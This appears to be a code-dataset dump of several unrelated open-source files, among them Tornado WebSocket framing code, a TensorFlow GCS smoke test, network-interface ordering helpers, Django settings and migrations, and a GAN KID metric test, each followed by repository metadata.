l = len(data)
if self.mask_outgoing:
mask_bit = 0x80
else:
mask_bit = 0
if l < 126:
frame += struct.pack("B", l | mask_bit)
elif l <= 0xFFFF:
frame += struct.pack("!BH", 126 | mask_bit, l)
else:
frame += struct.pack("!BQ", 127 | mask_bit, l)
if self.mask_outgoing:
mask = os.urandom(4)
data = mask + _websocket_mask(mask, data)
frame += data
self._wire_bytes_out += len(frame)
try:
return self.stream.write(frame)
except StreamClosedError:
self._abort()
def write_message(self, message, binary=False):
"""Sends the given message to the client of this Web Socket."""
if binary:
opcode = 0x2
else:
opcode = 0x1
message = tornado.escape.utf8(message)
assert isinstance(message, bytes)
self._message_bytes_out += len(message)
flags = 0
if self._compressor:
message = self._compressor.compress(message)
flags |= self.RSV1
return self._write_frame(True, opcode, message, flags=flags)
def write_ping(self, data):
"""Send ping frame."""
assert isinstance(data, bytes)
self._write_frame(True, 0x9, data)
def _receive_frame(self):
try:
self.stream.read_bytes(2, self._on_frame_start)
except StreamClosedError:
self._abort()
def _on_frame_start(self, data):
self._wire_bytes_in += len(data)
header, payloadlen = struct.unpack("BB", data)
self._final_frame = header & self.FIN
reserved_bits = header & self.RSV_MASK
self._frame_opcode = header & self.OPCODE_MASK
self._frame_opcode_is_control = self._frame_opcode & 0x8
if self._decompressor is not None and self._frame_opcode != 0:
self._frame_compressed = bool(reserved_bits & self.RSV1)
reserved_bits &= ~self.RSV1
if reserved_bits:
# client is using as-yet-undefined extensions; abort
self._abort()
return
self._masked_frame = bool(payloadlen & 0x80)
payloadlen = payloadlen & 0x7f
if self._frame_opcode_is_control and payloadlen >= 126:
# control frames must have payload < 126
self._abort()
return
try:
if payloadlen < 126:
self._frame_length = payloadlen
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length,
self._on_frame_data)
elif payloadlen == 126:
self.stream.read_bytes(2, self._on_frame_length_16)
elif payloadlen == 127:
self.stream.read_bytes(8, self._on_frame_length_64)
except StreamClosedError:
self._abort()
def _on_frame_length_16(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!H", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_frame_length_64(self, data):
self._wire_bytes_in += len(data)
self._frame_length = struct.unpack("!Q", data)[0]
try:
if self._masked_frame:
self.stream.read_bytes(4, self._on_masking_key)
else:
self.stream.read_bytes(self._frame_length, self._on_frame_data)
except StreamClosedError:
self._abort()
def _on_masking_key(self, data):
self._wire_bytes_in += len(data)
self._frame_mask = data
try:
self.stream.read_bytes(self._frame_length,
self._on_masked_frame_data)
except StreamClosedError:
self._abort()
def _on_masked_frame_data(self, data):
# Don't touch _wire_bytes_in; we'll do it in _on_frame_data.
self._on_frame_data(_websocket_mask(self._frame_mask, data))
def _on_frame_data(self, data):
self._wire_bytes_in += len(data)
if self._frame_opcode_is_control:
# control frames may be interleaved with a series of fragmented
# data frames, so control frames must not interact with
# self._fragmented_*
if not self._final_frame:
# control frames must not be fragmented
self._abort()
return
opcode = self._frame_opcode
elif self._frame_opcode == 0: # continuation frame
if self._fragmented_message_buffer is None:
# nothing to continue
self._abort()
return
self._fragmented_message_buffer += data
if self._final_frame:
opcode = self._fragmented_message_opcode
data = self._fragmented_message_buffer
self._fragmented_message_buffer = None
else: # start of new data message
if self._fragmented_message_buffer is not None:
# can't start new message until the old one is finished
self._abort()
return
if self._final_frame:
opcode = self._frame_opcode
else:
self._fragmented_message_opcode = self._frame_opcode
self._fragmented_message_buffer = data
if self._final_frame:
self._handle_message(opcode, data)
if not self.client_terminated:
self._receive_frame()
def _handle_message(self, opcode, data):
if self.client_terminated:
return
if self._frame_compressed:
data = self._decompressor.decompress(data)
if opcode == 0x1:
# UTF-8 data
self._message_bytes_in += len(data)
try:
decoded = data.decode("utf-8")
except UnicodeDecodeError:
self._abort()
return
self._run_callback(self.handler.on_message, decoded)
elif opcode == 0x2:
# Binary data
self._message_bytes_in += len(data)
self._run_callback(self.handler.on_message, data)
elif opcode == 0x8:
# Close
self.client_terminated = True
if len(data) >= 2:
self.handler.close_code = struct.unpack('>H', data[:2])[0]
if len(data) > 2:
self.handler.close_reason = to_unicode(data[2:])
# Echo the received close code, if any (RFC 6455 section 5.5.1).
self.close(self.handler.close_code)
elif opcode == 0x9:
# Ping
self._write_frame(True, 0xA, data)
elif opcode == 0xA:
# Pong
self._run_callback(self.handler.on_pong, data)
else:
self._abort()
def close(self, code=None, reason=None):
"""Closes the WebSocket connection."""
if not self.server_terminated:
if not self.stream.closed():
if code is None and reason is not None:
code = 1000 # "normal closure" status code
if code is None:
close_data = b''
else:
close_data = struct.pack('>H', code)
if reason is not None:
close_data += utf8(reason)
self._write_frame(True, 0x8, close_data)
self.server_terminated = True
if self.client_terminated:
if self._waiting is not None:
self.stream.io_loop.remove_timeout(self._waiting)
self._waiting = None
self.stream.close()
elif self._waiting is None:
# Give the client a few seconds to complete a clean shutdown,
# otherwise just close the connection.
self._waiting = self.stream.io_loop.add_timeout(
self.stream.io_loop.time() + 5, self._abort)
class WebSocketClientConnection(simple_httpclient._HTTPConnection):
"""WebSocket client connection.
This class should not be instantiated directly; use the
`websocket_connect` function instead.
"""
def __init__(self, io_loop, request, on_message_callback=None,
compression_options=None):
self.compression_options = compression_options
self.connect_future = TracebackFuture()
self.protocol = None
self.read_future = None
self.read_queue = collections.deque()
self.key = base64.b64encode(os.urandom(16))
self._on_message_callback = on_message_callback
self.close_code = self.close_reason = None
scheme, sep, rest = request.url.partition(':')
scheme = {'ws': 'http', 'wss': 'https'}[scheme]
request.url = scheme + sep + rest
request.headers.update({
'Upgrade': 'websocket',
'Connection': 'Upgrade',
'Sec-WebSocket-Key': self.key,
'Sec-WebSocket-Version': '13',
})
if self.compression_options is not None:
# Always offer to let the server set our max_wbits (and even though
# we don't offer it, we will accept a client_no_context_takeover
# from the server).
# TODO: set server parameters for deflate extension
# if requested in self.compression_options.
request.headers['Sec-WebSocket-Extensions'] = (
'permessage-deflate; client_max_window_bits')
self.tcp_client = TCPClient(io_loop=io_loop)
super(WebSocketClientConnection, self).__init__(
io_loop, None, request, lambda: None, self._on_http_response,
104857600, self.tcp_client, 65536, 104857600)
def close(self, code=None, reason=None):
"""Closes the websocket connection.
``code`` and ``reason`` are documented under
`WebSocketHandler.close`.
.. versionadded:: 3.2
.. versionchanged:: 4.0
Added the ``code`` and ``reason`` arguments.
"""
if self.protocol is not None:
self.protocol.close(code, reason)
self.protocol = None
def on_connection_close(self):
if not self.connect_future.done():
self.connect_future.set_exception(StreamClosedError())
self.on_message(None)
self.tcp_client.close()
super(WebSocketClientConnection, self).on_connection_close()
def _on_http_response(self, response):
if not self.connect_future.done():
if response.error:
self.connect_future.set_exception(response.error)
else:
self.connect_future.set_exception(WebSocketError(
"Non-websocket response"))
def headers_received(self, start_line, headers):
if start_line.code != 101:
return super(WebSocketClientConnection, self).headers_received(
start_line, headers)
self.headers = headers
self.protocol = self.get_websocket_protocol()
self.protocol._process_server_headers(self.key, self.headers)
self.protocol._receive_frame()
if self._timeout is not None:
self.io_loop.remove_timeout(self._timeout)
self._timeout = None
self.stream = self.connection.detach()
self.stream.set_close_callback(self.on_connection_close)
# Once we've taken over the connection, clear the final callback
# we set on the http request. This deactivates the error handling
# in simple_httpclient that would otherwise interfere with our
# ability to see exceptions.
self.final_callback = None
self.connect_future.set_result(self)
def write_message(self, message, binary=False):
"""Sends a message to the WebSocket server."""
return self.protocol.write_message(message, binary)
def read_message(self, callback=None):
"""Reads a message from the WebSocket server.
If on_message_callback was specified at WebSocket
initialization, this function will never return messages
Returns a future whose result is the message, or None
if the connection is closed. If a callback argument
is given it will be called with the future when it is
ready.
"""
assert self.read_future is None
future = TracebackFuture()
if self.read_queue:
future.set_result(self.read_queue.popleft())
else:
self.read_future = future
if callback is not None:
self.io_loop.add_future(future, callback)
return future
def on_message(self, message):
if self._on_message_callback:
self._on_message_callback(message)
elif self.read_future is not None:
self.read_future.set_result(message)
self.read_future = None
else:
self.read_queue.append(message)
def on_pong(self, data):
pass
def get_websocket_protocol(self):
return WebSocketProtocol13(self, mask_outgoing=True,
compression_options=self.compression_options)
def websocket_connect(url, io_loop=None, callback=None, connect_timeout=None,
on_message_callback=None, compression_options=None):
"""Client-side websocket support.
Takes a url and returns a Future whose result is a
`WebSocketClientConnection`.
``compression_options`` is interpreted in the same way as the
return value of `.WebSocketHandler.get_compression_options`.
The connection supports two styles of operation. In the coroutine
style, the application typically calls
`~.WebSocketClientConnection.read_message` in a loop::
conn = yield websocket_connect(url)
while True:
msg = yield conn.read_message()
if msg is None: break
# Do something with msg
In the callback style, pass an ``on_message_callback`` to
``websocket_connect``. In both styles, a message of ``None``
indicates that the connection has been closed.
.. versionchanged:: 3.2
Also accepts ``HTTPRequest`` objects in place of urls.
.. versionchanged:: 4.1
Added ``compression_options`` and ``on_message_callback``.
The ``io_loop`` argument is deprecated.
"""
if io_loop is None:
io_loop = IOLoop.current()
if isinstance(url, httpclient.HTTPRequest):
assert connect_timeout is None
request = url
# Copy and convert the headers dict/object (see comments in
# AsyncHTTPClient.fetch)
request.headers = httputil.HTTPHeaders(request.headers)
else:
request = httpclient.HTTPRequest(url, connect_timeout=connect_timeout)
request = httpclient._RequestProxy(
request, httpclient.HTTPRequest._DEFAULTS)
conn = WebSocketClientConnection(io_loop, request,
on_message_callback=on_message_callback,
compression_options=compression_options)
if callback is not None:
io_loop.add_future(conn.connect_future, callback)
return conn.connect_future
| 38.356538
| 80
| 0.625929
|
129b21745d4afa68f105bfb64a50ad73a74bd5c3
| 5,556
|
py
|
Python
|
tensorflow/tools/gcs_test/python/gcs_smoke.py
|
ankush-me/tensorflow
|
ec7f37e40fedb23435bfb7e28668e5fa63ff52f3
|
[
"Apache-2.0"
] | 2
|
2017-10-14T09:13:27.000Z
|
2017-10-26T18:34:28.000Z
|
tensorflow/tools/gcs_test/python/gcs_smoke.py
|
kiliczsh/tensorflow
|
f49aca4532c155597c669cf2189f211cafbebf96
|
[
"Apache-2.0"
] | null | null | null |
tensorflow/tools/gcs_test/python/gcs_smoke.py
|
kiliczsh/tensorflow
|
f49aca4532c155597c669cf2189f211cafbebf96
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Smoke test for reading records from GCS to TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import random
import sys
import time
import numpy as np
import tensorflow as tf
from tensorflow.core.example import example_pb2
from tensorflow.python.lib.io import file_io
flags = tf.app.flags
flags.DEFINE_string("gcs_bucket_url", "",
"The URL to the GCS bucket in which the temporary "
"tfrecord file is to be written and read, e.g., "
"gs://my-gcs-bucket/test-directory")
flags.DEFINE_integer("num_examples", 10, "Number of examples to generate")
FLAGS = flags.FLAGS
def create_examples(num_examples, input_mean):
"""Create ExampleProto's containg data."""
ids = np.arange(num_examples).reshape([num_examples, 1])
inputs = np.random.randn(num_examples, 1) + input_mean
target = inputs - input_mean
examples = []
for row in range(num_examples):
ex = example_pb2.Example()
ex.features.feature["id"].bytes_list.value.append(str(ids[row, 0]))
ex.features.feature["target"].float_list.value.append(target[row, 0])
ex.features.feature["inputs"].float_list.value.append(inputs[row, 0])
examples.append(ex)
return examples
def create_dir_test():
"""Verifies file_io directory handling methods ."""
starttime = int(round(time.time() * 1000))
dir_name = "%s/tf_gcs_test_%s" % (FLAGS.gcs_bucket_url, starttime)
print("Creating dir %s" % dir_name)
file_io.create_dir(dir_name)
elapsed = int(round(time.time() * 1000)) - starttime
print("Created directory in: %d milliseconds" % elapsed)
# Check that the directory exists.
dir_exists = file_io.is_directory(dir_name)
print("%s directory exists: %s" % (dir_name, dir_exists))
# List contents of just created directory.
print("Listing directory %s." % dir_name)
starttime = int(round(time.time() * 1000))
print(file_io.list_directory(dir_name))
elapsed = int(round(time.time() * 1000)) - starttime
print("Listed directory %s in %s milliseconds" % (dir_name, elapsed))
# Delete directory.
print("Deleting directory %s." % dir_name)
starttime = int(round(time.time() * 1000))
file_io.delete_recursively(dir_name)
elapsed = int(round(time.time() * 1000)) - starttime
print("Deleted directory %s in %s milliseconds" % (dir_name, elapsed))
if __name__ == "__main__":
# Sanity check on the GCS bucket URL.
if not FLAGS.gcs_bucket_url or not FLAGS.gcs_bucket_url.startswith("gs://"):
print("ERROR: Invalid GCS bucket URL: \"%s\"" % FLAGS.gcs_bucket_url)
sys.exit(1)
# Generate random tfrecord path name.
input_path = FLAGS.gcs_bucket_url + "/"
input_path += "".join(random.choice("0123456789ABCDEF") for i in range(8))
input_path += ".tfrecord"
print("Using input path: %s" % input_path)
# Verify that writing to the records file in GCS works.
print("\n=== Testing writing and reading of GCS record file... ===")
example_data = create_examples(FLAGS.num_examples, 5)
with tf.python_io.TFRecordWriter(input_path) as hf:
for e in example_data:
hf.write(e.SerializeToString())
print("Data written to: %s" % input_path)
# Verify that reading from the tfrecord file works and that
# tf_record_iterator works.
record_iter = tf.python_io.tf_record_iterator(input_path)
read_count = 0
for r in record_iter:
read_count += 1
print("Read %d records using tf_record_iterator" % read_count)
if read_count != FLAGS.num_examples:
print("FAIL: The number of records read from tf_record_iterator (%d) "
"differs from the expected number (%d)" % (read_count,
FLAGS.num_examples))
sys.exit(1)
# Verify that running the read op in a session works.
print("\n=== Testing TFRecordReader.read op in a session... ===")
with tf.Graph().as_default() as g:
filename_queue = tf.train.string_input_producer([input_path], num_epochs=1)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
with tf.Session() as sess:
sess.run(tf.initialize_all_variables())
sess.run(tf.initialize_local_variables())
tf.train.start_queue_runners()
index = 0
for _ in range(FLAGS.num_examples):
print("Read record: %d" % index)
sess.run(serialized_example)
index += 1
# Reading one more record should trigger an exception.
try:
sess.run(serialized_example)
print("FAIL: Failed to catch the expected OutOfRangeError while "
"reading one more record than is available")
sys.exit(1)
except tf.errors.OutOfRangeError:
print("Successfully caught the expected OutOfRangeError while "
"reading one more record than is available")
create_dir_test()
| 39.126761
| 80
| 0.690605
|
8dcce585e174a76e4756d85c2fad74ed83ca4909
| 5,752
|
py
|
Python
|
CadVlan/EquipInterface/business.py
|
marcusgc/GloboNetworkAPI-WebUI
|
1172f14028f9c116d71df7489eda770446b131d2
|
[
"Apache-2.0"
] | 17
|
2015-05-19T20:03:45.000Z
|
2022-03-24T06:19:47.000Z
|
CadVlan/EquipInterface/business.py
|
marcusgc/GloboNetworkAPI-WebUI
|
1172f14028f9c116d71df7489eda770446b131d2
|
[
"Apache-2.0"
] | 41
|
2015-01-27T18:36:07.000Z
|
2021-06-10T20:34:03.000Z
|
CadVlan/EquipInterface/business.py
|
marcusgc/GloboNetworkAPI-WebUI
|
1172f14028f9c116d71df7489eda770446b131d2
|
[
"Apache-2.0"
] | 19
|
2016-09-12T07:35:42.000Z
|
2022-01-28T23:46:11.000Z
|
# -*- coding:utf-8 -*-
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from operator import itemgetter
from CadVlan.settings import PATCH_PANEL_ID
from CadVlan.Util.utility import get_id_in_list
def find_first_interface(interfs):
"""
Get first interface to show in edit form
"""
possible_firsts = []
for interf in interfs:
if interf['tipo_equip'] == str(PATCH_PANEL_ID):
back = interf['ligacao_back']
front = interf['ligacao_front']
if back == None or front == None:
possible_firsts.append(interf)
else:
possible_firsts.append(interf)
# If none is possible
if len(possible_firsts) == 0:
for interf in interfs:
possible_firsts.append(interf)
# Order by id
sorted_list = sorted(possible_firsts, key=itemgetter('id'))
# Get first
return sorted_list[0]
def get_initial(interf):
if interf['marca'] == "3":
combo = interf['interface'][0:2] if not interf['interface'].startswith("Serial") else "Serial"
else:
combo = ""
prot = 0
if interf['protegida'] == u'True':
prot = 1
return {'combo': combo, 'name': interf['interface'], 'description': interf['descricao'],
'protected': prot, 'equip_name': interf['equipamento_nome'],
'equip_id': interf['equipamento'], 'inter_id': interf['id'], 'int_type': interf['tipo'],
'channel': interf['sw_router'], 'back': interf['ligacao_back'], 'front': interf['ligacao_front']}
def next_interface(interface, interfs, last_id, first_time):
front = interface['ligacao_front']
back = interface['ligacao_back']
if not front == None and last_id != front:
inter_front = get_id_in_list(interfs, front)
return inter_front, interface['id'], False
elif last_id != back:
inter_back = get_id_in_list(interfs, back)
return inter_back, interface['id'], False
elif len(interfs) == 2:
if first_time:
inter_equal = interfs[1]
first_time = False
return inter_equal, inter_equal['id'], False
else:
return None, interfs[1]['id'], False
else:
return None, interface['id'], False
def make_initials_and_params(interfs, int_type_list=None):
initials = []
params = []
equip_types = []
up_list = []
down_list = []
front_or_back = []
parametros = []
# First interface to show in edit form
interface = find_first_interface(interfs)
# Connect lines
front = interface['ligacao_front']
back = interface['ligacao_back']
e_type = interface['tipo_equip']
if e_type == str(PATCH_PANEL_ID):
up, down = 2, 2
if front == None and not back == None:
down = 1
front_or_back.append("front")
elif back == None and not front == None:
down = 1
front_or_back.append("back")
if len(front_or_back) == 0:
front_or_back.append("front")
else:
up, down = 0, 2
if not front == None:
down = 1
# Add
brand = interface['marca'] if interface['tipo_equip'] != "2" else "0"
parametros.append(brand)
parametros.append(int_type_list)
params.append(parametros)
up_list.append(up)
down_list.append(down)
initials.append(get_initial(interface))
equip_types.append(interface['tipo_equip'])
last_id = interface['id']
first_time = True
while True:
# Get the next interface to show in edit form
interface, last_id, first_time = next_interface(interface, interfs, last_id, first_time)
if interface != None:
# Connect lines
front = interface['ligacao_front']
back = interface['ligacao_back']
e_type = interface['tipo_equip']
if e_type == str(PATCH_PANEL_ID):
up, down = 1, 1
if not front == last_id or not back == last_id:
if front == None or back == None:
down = 2
if front == last_id:
front_or_back.append("front")
elif back == last_id:
front_or_back.append("back")
else:
up, down = 1, 0
# Add
parametros = []
brand = interface['marca'] if interface['tipo_equip'] != "2" else "0"
parametros.append(brand)
parametros.append(int_type_list)
params.append(parametros)
up_list.append(up)
down_list.append(down)
initials.append(get_initial(interface))
equip_types.append(interface['tipo_equip'])
else:
break
# Reverse lists order to call pop method in template
params.reverse()
up_list.reverse()
down_list.reverse()
equip_types.reverse()
front_or_back.reverse()
return initials, params, equip_types, up_list, down_list, front_or_back
| 33.248555
| 109
| 0.613873
|
eb548eaf5a8e2428318c19ddd628f859254079cc
| 222
|
py
|
Python
|
project/settings/base/i18n.py
|
limitedeternity/django-skeleton
|
03001c81e36ae853831e57dea238ff7bddda4dbf
|
[
"MIT"
] | 2
|
2018-07-10T19:18:32.000Z
|
2018-07-22T12:38:21.000Z
|
project/settings/base/i18n.py
|
limitedeternity/django-skeleton
|
03001c81e36ae853831e57dea238ff7bddda4dbf
|
[
"MIT"
] | null | null | null |
project/settings/base/i18n.py
|
limitedeternity/django-skeleton
|
03001c81e36ae853831e57dea238ff7bddda4dbf
|
[
"MIT"
] | null | null | null |
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
from os.path import join
LANGUAGE_CODE = 'en-us'
USE_I18N = True
USE_L10N = True
LOCALE_PATHS = (join(PROJECT_DIR, 'conf/locale'),)
| 20.181818
| 54
| 0.711712
|
8ba7ef9bfef32b1d57db1c4383c81ae19b88b394
| 6,885
|
py
|
Python
|
tests/metrics/test_compute_kid.py
|
houliangict/mimicry
|
d9e43940254de4a85c78e644f2d2b1135de4b50d
|
[
"MIT"
] | 560
|
2020-03-31T07:07:26.000Z
|
2022-03-15T08:29:37.000Z
|
tests/metrics/test_compute_kid.py
|
houliangict/mimicry
|
d9e43940254de4a85c78e644f2d2b1135de4b50d
|
[
"MIT"
] | 34
|
2020-03-31T02:42:16.000Z
|
2021-12-10T15:47:30.000Z
|
tests/metrics/test_compute_kid.py
|
houliangict/mimicry
|
d9e43940254de4a85c78e644f2d2b1135de4b50d
|
[
"MIT"
] | 63
|
2020-04-04T09:56:22.000Z
|
2022-03-15T02:34:58.000Z
|
import os
import shutil
import pytest
import numpy as np
import tensorflow as tf
import torch
from torch_mimicry.metrics import compute_kid
from torch_mimicry.metrics.inception_model import inception_utils
from torch_mimicry.nets.gan import gan
class ExampleGen(gan.BaseGenerator):
def __init__(self,
bottom_width=4,
nz=4,
ngf=256,
loss_type='gan',
*args,
**kwargs):
super().__init__(nz=nz,
ngf=ngf,
bottom_width=bottom_width,
loss_type=loss_type,
*args,
**kwargs)
def forward(self, x):
output = torch.ones(x.shape[0], 3, 32, 32)
return output
class CustomDataset(torch.utils.data.Dataset):
def __init__(self, nchw=True):
super().__init__()
if nchw:
self.data = torch.ones(30, 3, 32, 32)
else:
self.data = torch.ones(30, 32, 32, 3)
def __len__(self):
return self.data.shape[0]
def __getitem__(self, idx):
return self.data[idx]
class TestComputeKID:
def setup(self):
self.netG = ExampleGen()
self.num_samples = 50
self.device = torch.device("cpu")
# Create inception graph once.
self.inception_path = './metrics/inception_model'
if not os.path.exists(self.inception_path):
os.makedirs(self.inception_path)
inception_utils.create_inception_graph(self.inception_path)
# Directory
self.log_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),
"test_log")
if not os.path.exists(self.log_dir):
os.makedirs(self.log_dir)
def _create_cached_file(self):
feat = np.ones((self.num_samples, 2048))
cached_file = os.path.join(self.log_dir, 'cached_kid.npz')
np.savez(cached_file, feat=feat)
def test_compute_gen_dist_feat(self):
if self.device.index is not None:
# Avoid unbounded memory usage
gpu_options = tf.compat.v1.GPUOptions(
allow_growth=True,
per_process_gpu_memory_fraction=0.15,
visible_device_list=str(self.device.index))
config = tf.compat.v1.ConfigProto(gpu_options=gpu_options)
else:
config = tf.compat.v1.ConfigProto(device_count={'GPU': 0})
with tf.compat.v1.Session(config=config) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
fake_feat = compute_kid.compute_gen_dist_feat(
netG=self.netG,
num_samples=self.num_samples,
sess=sess,
seed=0,
device=self.device,
batch_size=10,
print_every=1)
assert fake_feat.shape == (self.num_samples, 2048)
def test_compute_real_dist_feat(self):
if self.device.index is not None:
# Avoid unbounded memory usage
gpu_options = tf.GPUOptions(allow_growth=True,
per_process_gpu_memory_fraction=0.15,
visible_device_list=str(
self.device.index))
config = tf.compat.v1.ConfigProto(gpu_options=gpu_options)
else:
config = tf.compat.v1.ConfigProto(device_count={'GPU': 0})
with tf.compat.v1.Session(config=config) as sess:
sess.run(tf.compat.v1.global_variables_initializer())
real_feat = compute_kid.compute_real_dist_feat(
num_samples=self.num_samples,
sess=sess,
dataset='fake_data',
batch_size=10,
log_dir=self.log_dir)
assert real_feat.shape == (self.num_samples, 2048)
def test_kid_score(self):
custom_dataset = CustomDataset()
# Non default dataset
with pytest.raises(ValueError):
compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=None,
seed=0,
batch_size=10,
dataset='does_not_exist',
log_dir=self.log_dir)
# Custom dataset without feat file
with pytest.raises(ValueError):
compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=None,
seed=0,
batch_size=10,
dataset=custom_dataset,
log_dir=self.log_dir)
# Invalid dataset
with pytest.raises(ValueError):
compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=None,
seed=0,
batch_size=10,
dataset=None,
log_dir=self.log_dir)
# Test outputs
score, var = compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=self.device,
dataset='fake_data',
batch_size=10,
log_dir=self.log_dir,
seed=0)
assert type(score) == float
assert type(var) == float
# Run from cached
cached_file = os.path.join(self.log_dir, 'cached.npz')
self._create_cached_file()
score, var = compute_kid.kid_score(num_samples=self.num_samples,
netG=self.netG,
device=self.device,
dataset='fake_data',
batch_size=10,
log_dir=self.log_dir,
feat_file=cached_file,
seed=0)
assert type(score) == float
assert type(var) == float
def teardown(self):
if os.path.exists(self.log_dir):
shutil.rmtree(self.log_dir)
del self.netG
if __name__ == "__main__":
test = TestComputeKID()
test.setup()
test.test_compute_gen_dist_feat()
test.test_compute_real_dist_feat()
test.test_kid_score()
test.teardown()
| 34.949239
| 79
| 0.501235
|
3a997e6ec7941536f1cf10faae587fed4a6aedf9
| 489
|
py
|
Python
|
apps/imgur/migrations/0004_post_created.py
|
vanyakosmos/memes-reposter
|
7bcd1117a81777f0662bcca38690de0c0404dbfa
|
[
"MIT"
] | 26
|
2019-01-19T21:07:57.000Z
|
2022-03-07T16:07:52.000Z
|
apps/imgur/migrations/0004_post_created.py
|
vaniakosmos/telemgur
|
7bcd1117a81777f0662bcca38690de0c0404dbfa
|
[
"MIT"
] | 7
|
2020-02-11T22:59:44.000Z
|
2021-06-21T07:44:56.000Z
|
apps/imgur/migrations/0004_post_created.py
|
vaniakosmos/telemgur
|
7bcd1117a81777f0662bcca38690de0c0404dbfa
|
[
"MIT"
] | 9
|
2018-09-21T06:38:08.000Z
|
2022-01-26T11:57:28.000Z
|
# Generated by Django 2.0.3 on 2018-07-01 10:07
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
dependencies = [
('imgur', '0003_auto_20180630_1810'),
]
operations = [
migrations.AddField(
model_name='post',
name='created',
field=models.DateTimeField(auto_now_add=True, default=django.utils.timezone.now),
preserve_default=False,
),
]
| 23.285714
| 93
| 0.631902
|
284e287a3688f8daccb2ecba33a564e28d5f71eb
| 1,020
|
py
|
Python
|
blockapi/api/__init__.py
|
galvanizze/blockapi
|
d46fc17861d6e914b823bbbf77e312dcaac1b6af
|
[
"MIT"
] | null | null | null |
blockapi/api/__init__.py
|
galvanizze/blockapi
|
d46fc17861d6e914b823bbbf77e312dcaac1b6af
|
[
"MIT"
] | null | null | null |
blockapi/api/__init__.py
|
galvanizze/blockapi
|
d46fc17861d6e914b823bbbf77e312dcaac1b6af
|
[
"MIT"
] | null | null | null |
from blockapi.api.alethio import *
from blockapi.api.binance import *
from blockapi.api.blockchaininfo import *
from blockapi.api.blockchainos import *
from blockapi.api.blockchair import *
from blockapi.api.blockcypher import *
from blockapi.api.blockonomics import *
from blockapi.api.blockscout import *
from blockapi.api.btc import *
from blockapi.api.cardanoexplorer import *
from blockapi.api.chainso import *
from blockapi.api.cosmos import *
from blockapi.api.cryptoid import *
from blockapi.api.dcrdata import *
from blockapi.api.digonchain import *
from blockapi.api.eospark import *
from blockapi.api.etherscan import *
from blockapi.api.ethplorer import *
from blockapi.api.greymass import *
from blockapi.api.insight import *
from blockapi.api.neoscan import *
from blockapi.api.ontology import *
from blockapi.api.stellar import *
from blockapi.api.trezor import *
from blockapi.api.tronscan import *
from blockapi.api.tzscan import *
from blockapi.api.zchain import *
from blockapi.api.zensystem import *
| 35.172414
| 42
| 0.807843
|
31e6ca5fd267d56e197395ccebec90a010e945aa
| 169
|
py
|
Python
|
chapter03/my_test4.py
|
stavinski/grayhat_python_redux
|
882b66616426a5dc774331ad1894049d19702424
|
[
"MIT"
] | 4
|
2019-07-03T08:41:03.000Z
|
2022-02-22T03:36:01.000Z
|
chapter03/my_test4.py
|
stavinski/grayhat_python_redux
|
882b66616426a5dc774331ad1894049d19702424
|
[
"MIT"
] | null | null | null |
chapter03/my_test4.py
|
stavinski/grayhat_python_redux
|
882b66616426a5dc774331ad1894049d19702424
|
[
"MIT"
] | null | null | null |
import my_debugger
debugger = my_debugger.debugger()
pid = raw_input("Enter PID of process to attach to: ")
debugger.attach(int(pid))
debugger.run()
debugger.detach()
| 18.777778
| 54
| 0.757396
|
2b7fb186402f997a2141bae6b11bcd88a8a32e04
| 20
|
py
|
Python
|
Boolean/Boolean15.py
|
liyuanyuan11/Python
|
d94cc7ab39e56c6e24bfc741a30da77590d1d220
|
[
"MIT"
] | null | null | null |
Boolean/Boolean15.py
|
liyuanyuan11/Python
|
d94cc7ab39e56c6e24bfc741a30da77590d1d220
|
[
"MIT"
] | null | null | null |
Boolean/Boolean15.py
|
liyuanyuan11/Python
|
d94cc7ab39e56c6e24bfc741a30da77590d1d220
|
[
"MIT"
] | null | null | null |
print(True and True)
| 20
| 20
| 0.8
|
c9966126aca41191d74a67f4a782be2fc8e310fb
| 1,868
|
py
|
Python
|
deeplearn_base/test/test_start_container.py
|
Data-drone/dl_toolk
|
a4b620fe5a9f1e1cecff14e51c711fd41003fc46
|
[
"Apache-2.0"
] | 2
|
2019-08-10T10:29:21.000Z
|
2019-08-12T14:54:12.000Z
|
deeplearn_base/test/test_start_container.py
|
Data-drone/dl_toolk
|
a4b620fe5a9f1e1cecff14e51c711fd41003fc46
|
[
"Apache-2.0"
] | null | null | null |
deeplearn_base/test/test_start_container.py
|
Data-drone/dl_toolk
|
a4b620fe5a9f1e1cecff14e51c711fd41003fc46
|
[
"Apache-2.0"
] | 1
|
2018-10-17T18:52:34.000Z
|
2018-10-17T18:52:34.000Z
|
# Copyright (c) Jupyter Development Team.
# Distributed under the terms of the Modified BSD License.
import logging
import pytest
LOGGER = logging.getLogger(__name__)
@pytest.mark.parametrize(
"env,expected_server",
[
